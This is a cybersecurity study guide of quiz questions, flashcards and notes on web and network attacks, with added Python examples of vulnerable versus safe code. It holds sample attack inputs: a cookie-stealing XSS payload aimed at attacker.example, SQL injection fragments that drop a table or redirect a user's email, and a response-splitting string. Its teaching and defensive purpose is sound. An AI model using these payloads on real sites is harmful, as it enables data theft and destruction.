Questions and Answers

Why is securing server-side web applications often considered more difficult than protecting other systems?

  • Server-side applications are rarely updated, leaving them vulnerable to known exploits.
  • Server-side applications are inherently more complex and have a larger attack surface.
  • Traditional network security devices cannot always block web application attacks. (correct)
  • Client-side vulnerabilities are easier to exploit than server-side vulnerabilities.

What is a zero-day attack?

  • An attack that occurs on the zero hour of a specific day.
  • An attack that exploits vulnerabilities that have been known for zero days.
  • An attack that exploits previously unknown vulnerabilities. (correct)
  • An attack that requires zero privileges to execute.

In a networked computer system, where can application attacks be directed?

  • At the server, the client, or both. (correct)
  • Only at the client.
  • Only at networking devices.
  • Only at the server.

Which of the following is a key characteristic that distinguishes web application attacks from traditional network attacks?

  • Web-based attacks often exploit vulnerabilities in the application layer. (correct)

Which of the following best describes the primary difference between a web application attack and a client-side attack?

  • Web application attacks target server-side vulnerabilities, while client-side attacks exploit vulnerabilities in client applications. (correct)

An attacker embeds a zero-pixel iframe into a compromised website. What is the primary purpose of this technique?

  • To avoid visual detection of the malicious content. (correct)

How does an attacker typically gain access to a web server's operating system in a drive-by download attack?

  • By exploiting vulnerabilities in the web server software. (correct)

Which security vulnerability is exploited when an attacker injects malicious XML tags and data into a web application's database?

  • XML injection. (correct)

What is the primary goal of an XPath injection attack?

  • To manipulate XML Path Language (XPath) queries. (correct)

Which of the following HTTP headers is most likely to be manipulated in a client-side attack to potentially mislead a web server?

  • Referer. (correct)

What is the main characteristic of client-side attacks?

  • They exploit vulnerabilities in client applications that interact with a compromised server. (correct)

How does header manipulation facilitate client-side attacks?

  • By allowing attackers to modify HTTP headers, potentially altering the behavior or interpretation of requests and responses. (correct)

What is the primary function of add-ons or extensions in web browsers?

  • To add functionality and features to the web browser. (correct)

How can attackers exploit ActiveX to perform malicious attacks?

  • By taking advantage of vulnerabilities in ActiveX controls. (correct)

Why do attackers prioritize targeting networks?

  • Because exploiting one vulnerability can expose many devices. (correct)

Which of the following is the main objective of a Denial of Service (DoS) attack?

  • To prevent legitimate users from accessing a system or resource. (correct)

What makes Distributed Denial of Service (DDoS) attacks more potent than traditional DoS attacks?

  • DDoS attacks originate from multiple compromised computers. (correct)

What occurs during a ping flood attack, and what is its impact on the targeted server?

  • The server is flooded with ICMP echo request messages, leading to dropped legitimate connections. (correct)

Which of the following actions can malicious add-ons perform on a web browser?

  • Create additional browser toolbars. (correct)

Which of the following is NOT a type of networking-based attack?

  • Phishing. (correct)

Which HTTP header field, when manipulated, allows an attacker to potentially inject SQL commands into a database?

  • Accept-Language. (correct)

What type of cookie is stored in a computer's RAM and is automatically deleted when the web browser is closed?

  • Session cookie. (correct)

A website sets a cookie that remains on a user's hard drive even after the browser is closed. What type of cookie is this?

  • Persistent cookie. (correct)

Which of the following best describes the primary risk associated with first-party cookies?

  • They can be stolen and used to impersonate the user on the originating website. (correct)

Besides regular cookies, what other client-side storage mechanism can websites use to store data, with a larger storage capacity?

  • Locally Shared Object (LSO). (correct)

What is a session token used for in web applications, and how do attackers typically try to obtain it?

  • To maintain state between the user and the web application; attackers steal or guess the token. (correct)

An attacker modifies the Referer field in an HTTP request. What is the most likely reason for doing so?

  • To bypass security measures that rely on checking the origin of the request. (correct)

Which attack involves an attacker attempting to impersonate a legitimate user by stealing or guessing the user's session token?

  • Session hijacking. (correct)

In a Smurf attack, what is the primary technique used to direct responses towards the victim?

  • Spoofing the source address of the ping requests so that every host replies to the victim. (correct)

How does a SYN flood attack exploit the process of initiating a session between a client and a server?

  • By flooding the server with SYN packets from nonexistent or unreachable addresses, so the handshakes never complete and legitimate connections are refused. (correct)

What is the key difference between a passive and an active Man-in-the-Middle attack?

  • Passive attacks only capture and record data, while active attacks alter the contents of the transmission. (correct)

In the context of replay attacks, what is the attacker's primary goal when capturing and retransmitting network communications?

  • To impersonate a legitimate user or device and gain unauthorized access or establish a false trust relationship. (correct)

What are the two main criteria that a website must meet to be vulnerable to an XSS attack?

  • It accepts user input without validating it, and it uses that input in a response. (correct)

In the context of SQL injection, what is the primary goal of an attacker when probing a "forgotten password" feature with malformed input?

  • To learn whether the application validates its input. (correct)

Which type of DoS attack overwhelms a victim's system by exploiting the transmission of Internet Control Message Protocol (ICMP) echo requests?

  • Smurf attack. (correct)

Why is proper input validation crucial in preventing server-side web application attacks?

  • It mitigates the risk of attackers injecting malicious code or commands through user-supplied data. (correct)

What is the most significant risk associated with a successful replay attack that captures logon credentials?

  • Unauthorized access to user accounts and sensitive data. (correct)

What is the key difference between HTML and XML in the context of web development and data handling?

  • HTML uses predefined tags to instruct browsers on how to display text, while XML carries data using user-defined tags. (correct)

Which of the following attack types primarily aims to deceive network devices into sending responses to an unintended target?

  • Smurf attack. (correct)

In what scenario would a replay attack be most effective in establishing a trust relationship between an attacker and a server?

  • When the attacker captures a valid authentication message from a trusted device and replays it later. (correct)

An attacker injects the following SQL fragment into an email field: ' OR 'a'='a. What is the likely outcome of this injection?

  • The query returns every row, so the application displays all user email addresses, because the condition is always true. (correct)

A web application accepts XML data to process user profiles. An attacker injects malicious XML code. What type of server-side attack is this?

  • XML injection. (correct)

How can developers mitigate the risk of SQL injection vulnerabilities in web applications?

  • By using parameterized queries or stored procedures to handle user input. (correct)

When a victim visits a website that has been injected with malicious JavaScript through an XSS attack, what is the immediate risk?

  • Malicious instructions are sent to the victim's browser and executed there, potentially stealing information. (correct)

Flashcards

Server-Side Web Application Attacks

Attacks against the server side of a web application, most often delivered through the input it accepts from users.

Cross-Site Scripting (XSS)

Injecting scripts into a web site's responses so that they run in the browsers of clients who visit it.

XSS Attack Requirements

Requires a website that accepts unvalidated user input and uses it in a response.

SQL Injection

Targets the database behind an application by injecting SQL statements through the application's input.

SQL (Structured Query Language)

The language used to query and manipulate data in relational databases.

SQL Injection Example

Entering SQL fragments into a form field so that the application's query returns or modifies data it was never meant to.

XML Definition

A markup language for structuring and annotating data in text form using tags.

XML Purpose

Carries data rather than describing how to display it, using user-defined tags.

Application Attacks

Attacks targeting applications within a networked computer system, directed at the server, the client, or both.

Network Security Device Limitations

Security tools that are effective against traditional network threats often fail against application-level attacks.

HTTP Traffic Inspection

Many security devices do not analyze the data carried inside HTTP traffic.

Zero-Day Attack

An attack that exploits previously unknown vulnerabilities, leaving victims no time to prepare.

Client-Side Attacks

Attacks that exploit the applications on the client side of a connection.

Networking-Based Attacks

Attacks designed to exploit weaknesses in computer network protocols and infrastructure.

Overflow Attacks

Attacks that write data beyond the boundaries of an allocated buffer.

Plug-in

A third-party library that attaches to a web browser and can be embedded in web pages.

Add-ons or Extensions

Components that add extra functions to a web browser, such as new toolbars or menu options.

Malicious Add-ons

Add-ons written by attackers to harm a user's computer.

ActiveX

A Microsoft standard for applications to share information; vulnerabilities in ActiveX controls can be exploited for attacks.

Denial of Service (DoS)

An attempt to prevent authorized users from accessing a system, often by overwhelming it with requests.

Distributed Denial of Service (DDoS)

A DoS attack that uses a botnet of compromised computers to flood a target with requests.

Ping Flood Attack

Overwhelming a server with ICMP echo requests, causing it to drop legitimate connections.

Referer Field

An HTTP request header that indicates the page from which the current request was made.

XML Injection Attack

An attack in which the attacker injects XML tags and data into a database through a website that does not filter user data.

Response Splitting

A header manipulation attack in which injected CR/LF characters end the server's response early so the attacker can append a forged second response, injecting content or redirecting users.

XPath Injection

A specific XML injection attack that exploits XML Path Language (XPath) queries built from user input.

Cookies

Small text files stored on a user's computer that contain user-specific information.

Client-Side Application Attacks

Attacks targeting vulnerabilities in client applications that interact with a compromised server or process malicious data.

Drive-by Download

A client computer is compromised simply by viewing a web page.

First-Party Cookie

A cookie created by the website the user is currently viewing.

Compromised Web Server (Drive-by Download)

The attacker injects malicious content into a vulnerable web server, typically after gaining access to the server's operating system or web server software.

Third-Party Cookie

A cookie placed by a site's advertisers to record user preferences across different sites.

Session Cookie

A cookie stored in RAM that expires when the browser is closed.

Zero-Pixel Iframe

A hidden HTML inline frame used in drive-by downloads to avoid visual detection.

Header Manipulation

Modifying the fields of an HTTP header, which characterize the transmitted data, in order to conduct an attack.

Persistent Cookie

A cookie recorded on the computer's hard drive that does not expire when the browser closes.

HTTP Header Manipulation Examples

Header fields such as Referer and Accept-Language are changed to perform malicious tasks.

Session Hijacking

An attack in which the attacker steals or guesses a user's session token in order to impersonate that user.

Smurf Attack

A DoS attack in which the attacker tricks many devices into overwhelming a victim with replies to spoofed requests.

Smurf Attack Mechanism

The attacker sends a ping request to the network broadcast address with the victim's address as the source, so every host replies to the victim and floods it.

SYN Flood Attack

A DoS attack that exploits the TCP handshake by sending many SYN packets, usually with spoofed source addresses, so that half-open connections exhaust the server's resources.

SYN Flood Attack Process

The attacker sends SYN segments in IP packets to the server, setting the source address of each packet to an address that does not exist or cannot be reached, so the handshake never completes.

Interception Attacks

Attacks designed to secretly listen to or capture network communications.

Man-in-the-Middle Attack

An attacker intercepts legitimate communication, posing as each party to the other, and may alter data in transit.

Replay Attack

An attack that captures a transmission and later retransmits it to the original recipient.

Replay Attack - Trust Exploitation

An attacker captures a valid network message and resends it later to gain unauthorized access or establish a false trust relationship.

Study Notes

  • The session discusses application and networking-based attacks in cyber security.
  • The instructor will spend 2 to 2.5 hours on the slides, leaving 1.5 to 2 hours, including submission, for lab work.

Application Attacks

  • Attacks on networked computer system applications can target the server, client, or both

Server-Side Web Application Attacks

  • Securing server-side web applications is often more difficult than securing other systems.
  • Traditional network security devices cannot always block web application attacks.
    • Many network security devices do not inspect the content of HTTP traffic, so an attack carried inside an ordinary-looking request passes through.
  • A zero-day attack exploits previously unknown vulnerabilities.
    • Victims have little or no time to prepare for or defend against it.
  • Many attacks target the input that applications accept from users.
  • Common web application attacks are:
    • Cross-site scripting
    • SQL injection
    • XML injection

Cross-Site Scripting (XSS)

  • XSS involves injecting scripts into a web application so that they are delivered to, and run in, the browsers of its clients.
  • When a victim visits an injected page:
    • The malicious instructions are sent to their browser and executed with the site's privileges.
  • Some XSS attacks are designed to steal information retained by the browser, such as session cookies.
  • An XSS attack requires that a website:
    • Accepts user input without validation.
    • Uses this input in a response without encoding it.

Types of Cross-Site Scripting (XSS)

  • Reflected (non-persistent)
    • The script arrives in the request (for example in a URL parameter) and is echoed straight back in the response.
    • Nothing is stored on the server; the victim must be lured into sending the crafted request.
  • Stored (persistent)
    • The script is stored on the server (for example in a comment or profile field) and served to every user who requests the page.
    • It executes in each visitor's browser, not on the server, every time the affected page is viewed.
  • DOM (Document Object Model) XSS
    • Purely client side: the payload is never sent to the server.
    • The page's legitimate script reads attacker-controlled data (such as the URL fragment) and writes it into the DOM, which causes the malicious script to run.
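The reflected and stored cases above, as an added example that is not part of the original lesson: a minimal page renderer written two ways, with a constructed cookie-stealing payload standing in for what an attacker would put in a search parameter or a comment. The `attacker.example` host and the in-memory comment list are assumptions made for the example.

```python
"""Added example (not from the lesson): why 'accept input, echo it back' is all
an XSS attack needs, and what output encoding does to the payload."""
import html

# Constructed payload: what an attacker would put in a ?q= parameter or a comment.
PAYLOAD = ("<script>document.location='http://attacker.example/?c='"
           "+document.cookie</script>")

def render_vulnerable(query: str) -> str:
    # Reflected XSS: the query string is placed in the page unchanged.
    return f"<p>Results for: {query}</p>"

def render_safe(query: str) -> str:
    # Output encoding: < > & " ' become entities, so the browser shows the
    # payload as text instead of parsing it as markup.
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"

def is_script_injected(page: str) -> bool:
    # Crude check used only to make the difference visible: a live <script>
    # tag appears in the markup the browser will parse.
    return "<script>" in page.lower()

# Stored XSS differs only in timing: the payload is saved (this list stands in
# for a comments table, an assumption of the example) and echoed to every
# later visitor of the page.
COMMENTS = []

def post_comment(text: str) -> None:
    COMMENTS.append(text)

def render_comments(escape: bool) -> str:
    rows = (html.escape(c, quote=True) if escape else c for c in COMMENTS)
    return "".join(f"<li>{r}</li>" for r in rows)

if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
```

Encoding at the point where data is written into HTML is the control that matters; input validation on its own is not enough because the same string may be safe in one context (a database column) and dangerous in another (an HTML body).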

SQL Injection

  • SQL injection targets the database behind an application by injecting SQL through the application's input.
  • SQL (Structured Query Language) is used to manipulate data in relational databases.
  • Example: the attacker enters an incorrectly formatted email address in a "forgotten password" field.
    • The response from the website tells the attacker whether the input is being validated.
  • The attacker then enters SQL fragments, which the application concatenates into its query and the database processes:
    • SELECT fieldlist FROM table WHERE field = 'whatever' or 'a'='a'
    • Because 'a'='a' is always true, the query returns every row, displaying all user email addresses.

SQL Injection Statement Examples

  • whatever' AND email IS NULL; --
    • Result: determine the names of different fields.
  • whatever' AND 1=(SELECT COUNT(*) FROM tabname); --
    • Result: discover the table name.
  • whatever' OR full_name LIKE '%Mia%
    • Result: find specific users (the application's own closing quote completes the pattern).
  • whatever'; DROP TABLE members; --
    • Result: erase the database table.
  • whatever'; UPDATE members SET email = '[email protected]' WHERE email = '[email protected]';
    • Result: mail the password to the attacker's email account.
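The tautology and LIKE fragments from the two lists above, as an added example that is not part of the lesson: they are run against a constructed in-memory SQLite table through a string-concatenated query, beside the parameterized version the lesson recommends. The table name, column names and sample rows are assumptions made for the example.

```python
"""Added example (not from the lesson): the lesson's injection fragments run
against SQLite, with and without placeholder binding."""
import sqlite3

# Constructed sample data: three accounts in a hypothetical 'members' table.
SAMPLE_MEMBERS = [
    ("alice", "alice@example.com"),
    ("bob", "bob@example.com"),
    ("mia", "mia@example.com"),
]

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (full_name TEXT, email TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_MEMBERS)
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, email_input: str) -> list:
    # The user-supplied value is pasted into the SQL text, so the attacker's
    # quote closes the literal and everything after it is parsed as SQL.
    sql = "SELECT email FROM members WHERE email = '" + email_input + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn: sqlite3.Connection, email_input: str) -> list:
    # Placeholder binding: the driver passes the value separately from the
    # statement, so the whole string is compared as one literal and matches nothing.
    sql = "SELECT email FROM members WHERE email = ?"
    return [row[0] for row in conn.execute(sql, (email_input,))]

TAUTOLOGY = "whatever' OR 'a'='a"
LIKE_PROBE = "whatever' OR full_name LIKE '%Mia%"  # closing quote comes from the query

if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, TAUTOLOGY))   # all three addresses
    print(lookup_vulnerable(conn, LIKE_PROBE))  # only mia's
    print(lookup_safe(conn, TAUTOLOGY))         # []
```

The stacked-query fragments (`DROP TABLE`, `UPDATE`) depend on whether the driver accepts more than one statement per call; `sqlite3`'s `execute()` refuses them, while other drivers and database APIs may not, so the fix is the same in every case: bind values, never concatenate them.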

XML Injection

  • XML injection attacks are similar to SQL injection attacks
  • The attacker discovers a Web site that does not filter user data and injects XML tags and data into the database.
  • XPath injection is a specific type of XML injection attack that exploits XML Path Language queries built from user input.

Client Side Attacks

  • Web application attacks are server-side attacks.
  • Client-side attacks target vulnerabilities in client applications.
  • The client application interacts with a compromised server and/or processes malicious data.
  • The client initiates the connection to the server, so an ordinary visit to a malicious or compromised site can result in an attack.

Drive-by download

  • The client computer is compromised simply by viewing a web page.
  • Attackers first inject content into a vulnerable web server.
    • This follows from gaining access to the server's operating system or exploiting the web server software.
  • Attackers craft zero-pixel iframes (inline frames) so the injected content is not visible.
  • The code is embedded within the main HTML document.
  • The client's browser loads the hidden frame and downloads the malicious script, which in turn downloads malware onto the computer.
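The zero-pixel iframe described above, as an added example that is not part of the lesson: a scanner built on the standard library's `html.parser` that flags iframes sized to zero or hidden by inline style. The sample page and the addresses in it are constructed for the example.

```python
"""Added example (not from the lesson): find the hidden inline frames that
drive-by download pages rely on to stay out of sight."""
from html.parser import HTMLParser
import re

# Constructed sample: a benign page with one injected zero-pixel frame
# (198.51.100.7 is a documentation address, not a real host).
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="https://video.example/embed/1" width="640" height="360"></iframe>
<iframe src="http://198.51.100.7/x.php" width="0" height="0" style="visibility:hidden"></iframe>
</body></html>"""

# Matches "0", "0px", "0.0" and similar zero-sized attribute values.
_ZERO = re.compile(r"^\s*0*(\.0+)?\s*(px)?\s*$")

class HiddenIframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hidden = []   # (src, reasons) for each suspicious frame

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        reasons = []
        for dim in ("width", "height"):
            if a.get(dim) is not None and _ZERO.match(a[dim]):
                reasons.append(f"{dim}=0")
        style = (a.get("style") or "").replace(" ", "").lower()
        for marker in ("display:none", "visibility:hidden", "width:0", "height:0"):
            if marker in style:
                reasons.append(marker)
        if reasons:
            self.hidden.append((a.get("src", ""), reasons))

def find_hidden_iframes(document: str) -> list:
    parser = HiddenIframeFinder()
    parser.feed(document)
    parser.close()
    return parser.hidden

if __name__ == "__main__":
    for src, why in find_hidden_iframes(SAMPLE_HTML):
        print(f"hidden iframe -> {src}: {', '.join(why)}")
```

A check like this belongs in an integrity monitor for your own pages, where any iframe you did not put there is the finding; on third-party pages hidden frames also have legitimate uses, so treat a hit as a lead rather than a verdict.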

HTTP Header manipulation

  • HTTP headers contain fields that characterize the data being transmitted.
  • Request headers originate from the web browser.
    • Browsers do not normally let the user modify them.
    • A short program written by the attacker (or an intercepting proxy) can send a request with any header values it likes.

HTTP Header Manipulation Examples

  • Referer field: the attacker can modify it to hide the fact that the request came from another site, or to pass a check that trusts it.
  • Accept-Language field: if the server stores this header in a database without sanitizing it, the attacker can inject a SQL command through it.
  • Response splitting: one of the most common header manipulation attacks; CR/LF characters injected into a header value let the attacker end the server's response early and append a forged one.
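The Referer and response-splitting cases above, as an added example that is not part of the lesson: a redirect builder that copies user input into the Location header, the single check that closes the hole, and a Referer-based check to show why a value the client controls cannot serve as a security boundary. The `bank.example` origin, the `/home` path and the attacker's payload are constructed for the example.

```python
"""Added example (not from the lesson): HTTP response splitting through a
redirect built from user input, and the header-value check that stops it."""

def build_redirect_vulnerable(target: str) -> bytes:
    # The 'next' parameter is copied into the Location header unchanged.
    return (f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n"
            f"Content-Length: 0\r\n\r\n").encode()

def build_redirect_safe(target: str) -> bytes:
    # A header value can never legitimately contain CR or LF; reject rather
    # than embed, so the attacker cannot terminate the header block early.
    if "\r" in target or "\n" in target:
        raise ValueError("CR/LF in header value")
    return build_redirect_vulnerable(target)

def split_responses(raw: bytes) -> list:
    """How many HTTP responses a naive client or cache sees in the byte stream."""
    parts = raw.split(b"\r\n\r\n")
    return [p for p in parts if p.startswith(b"HTTP/1.")]

# Constructed attacker value for the 'next' parameter: it closes the real
# response and starts a forged one whose body a cache in the path would
# attribute to the legitimate server.
ATTACK = ("/home\r\nContent-Length: 0\r\n\r\n"
          "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 23\r\n\r\n"
          "<script>evil()</script>")

def referer_allows(headers: dict) -> bool:
    # A common but weak origin check: the client sets every request header,
    # so a script can supply whatever Referer the check expects.
    return headers.get("Referer", "").startswith("https://bank.example/")

if __name__ == "__main__":
    print(len(split_responses(build_redirect_vulnerable("/home"))))   # 1
    print(len(split_responses(build_redirect_vulnerable(ATTACK))))    # 2
    print(referer_allows({"Referer": "https://bank.example/transfer"}))  # True, even if forged
```

Modern server frameworks apply the CR/LF rejection for you when you set headers through their API; the vulnerability reappears whenever code writes raw header bytes itself.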

Cookies

  • Cookies store user-specific information on the user's local computer.
  • First-party cookie: created by the website the user is viewing.
  • Third-party cookie: placed by a site's advertisers to record user preferences across sites.
  • Session cookie: stored in RAM and expires when the browser is closed.
  • Persistent cookie: recorded on the computer's hard drive and does not expire when the browser closes; also called a tracking cookie.
  • Locally Shared Object (LSO): can store up to 100 KB of data, is more complex than a cookie, and is also called a Flash cookie.
  • Security and privacy risks:
    • First-party cookies may be stolen and used to impersonate the user.
    • Cookies are used to tailor advertising and can be exploited by attackers.

Attachments

  • Attachments are files coupled with email messages.
  • Malicious attachments are commonly used to spread viruses, Trojans, and other malware.

Session Hijacking

  • An attacker attempts to impersonate a user by stealing or guessing the user's session token.
  • A session token is a random string assigned to one interaction between a user and a web application.
  • The attacker can attempt to obtain the session token by:
    • Using XSS or other attacks
    • Eavesdropping on the transmission
    • Guessing the session token
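The three ways of obtaining a token listed above, and the cookie risks from the previous section, as an added example that is not part of the lesson: a deliberately guessable token scheme beside a properly random one, and the `Set-Cookie` attributes that put the good token out of reach of script (`HttpOnly`) and of plain-HTTP eavesdropping (`Secure`). The `WeakSessions` design, the cookie name `sid` and the user names are assumptions made for the example.

```python
"""Added example (not from the lesson): guessable versus random session tokens,
constant-time lookup, and the cookie attributes that protect the token."""
import hmac
import secrets

class WeakSessions:
    # Hypothetical bad design: the token is a counter, so one observed token
    # lets the attacker enumerate its neighbours.
    def __init__(self):
        self._next = 1000
        self.active = {}

    def issue(self, user: str) -> str:
        tok = str(self._next)
        self._next += 1
        self.active[tok] = user
        return tok

def guess_neighbours(token: str, width: int = 5) -> list:
    """The 'guessing' attack against WeakSessions: try nearby counter values."""
    base = int(token)
    return [str(base + d) for d in range(-width, width + 1) if d != 0]

class Sessions:
    def __init__(self):
        self.active = {}

    def issue(self, user: str) -> str:
        tok = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG, 43 URL-safe chars
        self.active[tok] = user
        return tok

    def lookup(self, token: str):
        # Compare in constant time so response timing leaks nothing about
        # how many leading characters of a guess were right.
        for stored, user in self.active.items():
            if hmac.compare_digest(stored, token):
                return user
        return None

def session_cookie(token: str) -> str:
    # HttpOnly: not readable by document.cookie, so XSS cannot exfiltrate it.
    # Secure: never sent over plain HTTP, so it cannot be sniffed in transit.
    # SameSite=Lax: not attached to most cross-site requests.
    return f"Set-Cookie: sid={token}; Path=/; HttpOnly; Secure; SameSite=Lax"

if __name__ == "__main__":
    weak = WeakSessions()
    weak.issue("alice")
    mine = weak.issue("mallory")
    print([g for g in guess_neighbours(mine) if g in weak.active])  # alice's token
    good = Sessions()
    print(session_cookie(good.issue("alice")))
```

`HttpOnly` does not stop an XSS payload from issuing requests as the victim while the page is open; it only keeps the token itself from leaving the browser, which is what makes the replay-later attack in the lesson fail.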

Malicious Add-ons

A plug-in is a third-party library that attaches to the web browser and can be embedded in a web page.

  • Add-ons/extensions add functionality to the web browser.
  • Add-ons can:
    • Create web browser toolbars.
    • Change browser menus.
    • Be aware of other tabs open in the same browser.
    • Process loaded web page content.

Add-On Security Risks

  • Attackers create malicious add-ons targeting a user's computer.
  • Malicious add-ons can be written in Microsoft's ActiveX.
    • ActiveX is a set of rules for how applications under the Microsoft Windows OS should share information.
  • Vulnerabilities in ActiveX controls can be exploited by an attacker to perform malicious actions on the computer.

Networking-Based Attacks

  • Attackers place a high priority on targeting networks.
    • Exploiting a single vulnerability may expose hundreds/thousands of devices to an attacker.
  • Types of networking-based attacks:
    • Denial of Service (DoS)
    • Interception
    • Poisoning
    • Attacks on access rights

Denial of Service (DoS)

  • DoS: A deliberate attempt to overwhelm a system, preventing authorized users from accessing it.
  • Most DoS attacks today are Distributed Denial of Service (DDoS).
    • Using hundreds/thousands of zombie computers in a botnet to flood a device with requests.

Ping Flood Attack

  • Uses the 'ping' utility to send a large number of ICMP echo request messages.
  • In a ping flood attack, multiple computers rapidly send a large number of ICMP echo requests.
    • The server drops legitimate connections and refuses new connections.

Smurf Attack

  • Tricks devices on a network into flooding an unsuspecting victim with replies to requests the victim never made.
  • The attacker sends a ping request to the network's broadcast address, so every host receives it.
    • The source address of the request is changed to the victim's address (spoofing).
  • It appears as if the victim's computer is asking every computer on the network for a response.
  • All of them reply to the victim's computer, overwhelming it so that it crashes or becomes unavailable to legitimate users.

SYN Flood Attack

  • Takes advantage of the three-way handshake used to initiate a TCP session.
  • In a SYN flood attack against a web server:
    • The attacker sends a stream of SYN segments in IP packets.
    • The attacker modifies the source address of each packet to an address that does not exist or cannot be reached.
    • The server replies with SYN-ACK and waits for the final ACK, which never arrives; these half-open connections fill its connection table until legitimate clients are refused.
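Detection logic for the Smurf and SYN flood patterns described in the two sections above (the ping flood is plain rate counting and is not shown), as an added example that is not part of the lesson. It runs over a constructed packet summary of the kind a capture tool exports; the addresses come from the documentation ranges and the thresholds are assumptions for the example.

```python
"""Added example (not from the lesson): flag a SYN flood by half-open
connections per target, and a Smurf attack by echo-reply fan-in per victim."""
from collections import defaultdict

# Constructed packet summaries: proto, src, dst, then TCP flags or ICMP type.
PACKETS = (
    # a normal client that completes its handshake
    [{"proto": "tcp", "src": "203.0.113.5", "dst": "192.0.2.10", "flags": "S"},
     {"proto": "tcp", "src": "203.0.113.5", "dst": "192.0.2.10", "flags": "A"}]
    # SYN flood: 50 SYNs from spoofed addresses that never send an ACK
    + [{"proto": "tcp", "src": f"198.51.100.{i}", "dst": "192.0.2.10", "flags": "S"}
       for i in range(1, 51)]
    # Smurf: echo replies from a whole /24 converging on one victim
    + [{"proto": "icmp", "src": f"192.0.2.{i}", "dst": "203.0.113.99", "type": "echo-reply"}
       for i in range(1, 201)]
)

def half_open_by_target(packets) -> dict:
    """Per destination, the number of sources that sent SYN but never ACKed."""
    syn = defaultdict(set)
    acked = defaultdict(set)
    for p in packets:
        if p["proto"] != "tcp":
            continue
        if "S" in p["flags"] and "A" not in p["flags"]:
            syn[p["dst"]].add(p["src"])
        elif "A" in p["flags"]:
            acked[p["dst"]].add(p["src"])
    return {dst: len(srcs - acked[dst]) for dst, srcs in syn.items()}

def echo_reply_fanin(packets) -> dict:
    """Per destination, how many distinct hosts sent it ICMP echo replies.
    A Smurf victim receives replies from hosts it never pinged."""
    fanin = defaultdict(set)
    for p in packets:
        if p["proto"] == "icmp" and p.get("type") == "echo-reply":
            fanin[p["dst"]].add(p["src"])
    return {dst: len(srcs) for dst, srcs in fanin.items()}

def alerts(packets, syn_threshold: int = 20, smurf_threshold: int = 50) -> list:
    out = []
    for dst, n in half_open_by_target(packets).items():
        if n >= syn_threshold:
            out.append(f"SYN flood suspected against {dst}: {n} half-open sources")
    for dst, n in echo_reply_fanin(packets).items():
        if n >= smurf_threshold:
            out.append(f"Smurf amplification suspected against {dst}: replies from {n} hosts")
    return out

if __name__ == "__main__":
    for line in alerts(PACKETS):
        print(line)
```

The SYN-side count is the same quantity a kernel tracks when it decides to fall back to SYN cookies; a monitor that reports it per target lets you see the attack before the server's backlog is exhausted.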

Interception

  • Interception attacks are designed to intercept network communications.
  • Man-in-the-Middle:
    • Two computers are sending and receiving data, and the attacker's computer sits between them.
    • The attacker intercepts the legitimate communication and forges a fictitious response to the sender, posing as each party to the other.
  • Two types of attack exist:
    • Passive: data is captured and recorded before being sent onward to the original recipient.
    • Active: the contents of the transmission are altered before they reach the recipient.

Replay attack

  • The attacker copies a transmission before sending it to the original recipient and can:
    • Use the copy at a later time
    • For example, capture logon credentials and resend them later
  • More sophisticated replay attacks:
    • The attacker captures a network device's message to a server.
    • The attacker later sends the original, valid message to the server.
    • This establishes a trust relationship between the attacker and the server.

Poisoning

  • Named by analogy with introducing a harmful substance into a system.
  • These attacks inject "poison" (false data) into a normal network process to facilitate an attack:
    • ARP poisoning
    • DNS poisoning

ARP Poisoning

  • The attacker sends forged ARP replies so that the victim's ARP cache maps an IP address to a MAC address the attacker chooses, redirecting traffic to a different computer.
  • Attacks from ARP poisoning:
    • Steal data: substitute the attacker's MAC address for another device's and receive the data intended for it.
    • Prevent Internet access: substitute an invalid MAC address for the network gateway's.
    • Man-in-the-middle: substitute the attacker's MAC address so the attacker's device receives all communications and forwards them on.
    • DoS: substitute an invalid MAC address for a valid IP address so that traffic to that host is lost.
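The gateway-substitution case above, as an added example that is not part of the lesson: a monitor that replays a constructed stream of ARP replies and reports every change to an existing IP-to-MAC binding, with an optional static table that pins critical hosts such as the gateway. The addresses, MACs and the pinning behaviour are assumptions made for the example.

```python
"""Added example (not from the lesson): detect ARP cache poisoning by watching
for an IP address whose MAC binding changes, and pin the gateway's entry."""

# Constructed ARP replies as (sender_ip, sender_mac). The gateway 192.0.2.1
# legitimately owns 00:11:22:33:44:01; the fourth reply is the attacker
# claiming the gateway's IP for its own MAC.
ARP_REPLIES = [
    ("192.0.2.1", "00:11:22:33:44:01"),
    ("192.0.2.20", "00:11:22:33:44:20"),
    ("192.0.2.1", "00:11:22:33:44:01"),
    ("192.0.2.1", "aa:bb:cc:dd:ee:ff"),   # poisoned reply
    ("192.0.2.20", "00:11:22:33:44:20"),
]

def detect_arp_changes(replies, trusted: dict = None) -> list:
    """Return (ip, old_mac, new_mac) for every reply that changes a binding.

    `trusted` is an optional static table (ip -> mac) for hosts that must never
    be overwritten, which is what a static ARP entry for the gateway does."""
    cache = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    pinned = set(cache)
    events = []
    for ip, mac in replies:
        mac = mac.lower()
        known = cache.get(ip)
        if known is None:
            cache[ip] = mac
        elif known != mac:
            events.append((ip, known, mac))
            if ip not in pinned:
                # An unpinned entry follows the network, exactly as a real
                # ARP cache would; that is why the gateway should be pinned.
                cache[ip] = mac
    return events

if __name__ == "__main__":
    for ip, old, new in detect_arp_changes(ARP_REPLIES):
        print(f"ARP binding for {ip} changed: {old} -> {new}")
```

Without pinning, a later legitimate reply from the real gateway produces a second change event, which is the flapping pattern that makes ARP poisoning easy to spot from a passive capture even when the attacker is careful.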

DNS Poisoning

  • The current basis for resolving names to IP addresses is the Domain Name System.
  • DNS poisoning substitutes a fraudulent IP address for a name's real address, redirecting the computer to another device.
  • Two locations where DNS poisoning can be done:
    • The local host table
    • An external DNS server

Session 3 Summary

  • Web application flaws are exploited through normal communication channels.
    • This makes web applications more difficult to protect.
